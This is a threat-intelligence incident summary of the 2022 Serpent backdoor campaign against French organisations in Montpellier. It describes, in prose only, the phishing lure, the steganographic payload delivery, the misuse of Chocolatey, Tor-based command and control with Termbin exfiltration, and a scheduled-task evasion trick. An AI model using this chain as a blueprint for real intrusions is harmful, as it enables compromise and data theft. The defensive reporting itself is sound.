Cyber Incident Victim: Montpellier
Date:
Mar 2022
Location:
France
Summary
A targeted cyberattack against French entities in construction, real estate, and government sectors employed a GDPR-themed lure via macro-enabled Word documents. The attack chain utilized steganographic images hosted on a compromised Jamaican credit union site to deliver malicious scripts, leveraging the Chocolatey package manager to install Python dependencies and deploy the Serpent backdoor. This backdoor established command-and-control via Tor proxy infrastructure, enabling remote command execution and exfiltration of outputs through Termbin pastebin services. Attackers implemented novel evasion techniques, including scheduled task manipulation to execute payloads as child processes of legitimate Windows binaries. The campaign demonstrated advanced tactics with previously unseen use of Chocolatey in malicious contexts, steganography for payload delivery, and infrastructure masquerading. While objectives remained unclear, compromise could facilitate data theft, host control, or additional payload deployment. Proofpoint attributed no known threat actor to the activity.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 3 motives | 2 techniques |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
In early March 2022, Proofpoint researchers identified a targeted cyberattack campaign impacting French organizations across the construction, real estate, and government sectors in Montpellier, Occitanie. The threat actor employed a multi-stage infection chain beginning with phishing emails containing French-language lures themed as job applications and GDPR compliance documents. One observed message originated from "Jeanne Vrakele" using a Gmail address and bore the subject line "Candidature - Jeanne Vrakele." Attached macro-enabled Microsoft Word documents purported to contain GDPR information but executed Visual Basic for Applications (VBA) macros upon enablement. These macros retrieved a steganographic image file hosted on a compromised Jamaican credit union website (fhccu[.]com), concealing a base64-encoded PowerShell script within what appeared to be a cartoon illustration. The script subsequently downloaded and installed the Chocolatey package manager—a legitimate open-source tool for Windows software automation not previously observed in malicious campaigns—which then installed Python and the PySocks proxy library.
The attack chain progressed as the initial PowerShell script fetched a second steganographic image from the same Jamaican domain, extracting a base64-encoded Python backdoor dubbed "Serpent" by researchers. This malware saved itself as MicrosoftSecurityUpdate.py and executed via a batch file. Serpent established command-and-control (C2) communications through two Tor proxy domains using the .onion[.]pet pseudo-top-level domain, with infrastructure URLs including mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd[.]onion[.]pet. The backdoor employed a polling mechanism to check an "order" server every 10 seconds, parsing commands formatted as "<random integer>--<hostname>--<command>." When hostnames matched the infected system, Serpent executed attacker-specified Windows commands, relayed output through the Termbin pastebin service via SOCKS5 proxies, and transmitted results to a secondary "answer" server using HTTP headers containing host identifiers and Termbin URLs. Proofpoint also identified an ancillary payload delivery technique leveraging the Windows Task Scheduler (schtasks.exe) to execute arbitrary binaries as child processes of the legitimate taskhostsw.exe, triggered by dummy event ID 777 creation—a previously undocumented detection evasion method. The campaign's objectives remained unclear, though compromised systems risked remote administration, data exfiltration, and secondary payload deployment. Proofpoint mitigated the threat through Emerging Threat signatures targeting Chocolatey-related network traffic (2035303, 2035306) and malicious script retrieval patterns (2851286), attributing detection to machine learning-assisted campaign clustering via their internal "Camp Disco" analysis tool.